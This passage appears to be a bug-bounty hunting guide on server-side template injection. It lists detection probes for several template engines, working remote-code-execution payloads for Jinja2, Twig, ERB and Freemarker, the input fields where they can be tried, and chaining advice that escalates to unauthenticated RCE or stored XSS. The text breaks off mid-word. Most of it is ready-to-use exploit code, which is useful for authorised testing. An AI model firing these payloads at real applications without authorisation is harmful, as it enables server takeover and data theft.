hunt-sstilisted

## 14. SSTI — SERVER-SIDE TEMPLATE INJECTION > Easy to detect, high payout ($2K–$8K). Direct path to RCE. ### Detection Payloads (try all) ``` {{7*7}} → 49 = Jinja2 / Twig ${7*7} → 49 = Freemarker / Velocity <%= 7*7 %> → 49 = ERB (Ruby) #{7*7} → 49 = Mako *{7*7} → 49 = Spring Thymeleaf {{7*'7'}} → 7777777 = Jinja2 (not Twig) ``` ### RCE Payloads **Jinja2 (Python/Flask):** ```python {{config.__class__.__init__.__globals__['os'].popen('id').read()}} ``` **Twig (PHP/Symfony):** ```php {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} ``` **ERB (Ruby):** ```ruby <%= `id` %> ``` ### Where to Test ``` Name/bio/description fields, email templates, invoice name, PDF generators, URL path parameters, search queries reflected in results, HTTP headers reflected ``` --- ## Related Skills & Chains - **`hunt-rce`** — SSTI is the easiest path to RCE on Python/Ruby/PHP/Java stacks because the template language already exposes the runtime. Chain primitive: Jinja2 `{{config.__class__.__init__.__globals__['os'].popen('id').read()}}` or Freemarker `<#assign x="freemarker.template.utility.Execute"?new()>${x("id")}` → unauthenticated RCE as the rendering worker. Always escalate fingerprint → class-walker → cmd exec. - **`hunt-xss`** — When the template engine sandboxes the runtime (or you only get the rendered output back as HTML), the same `{{7*7}}` reflection often still yields stored XSS. Chain primitiv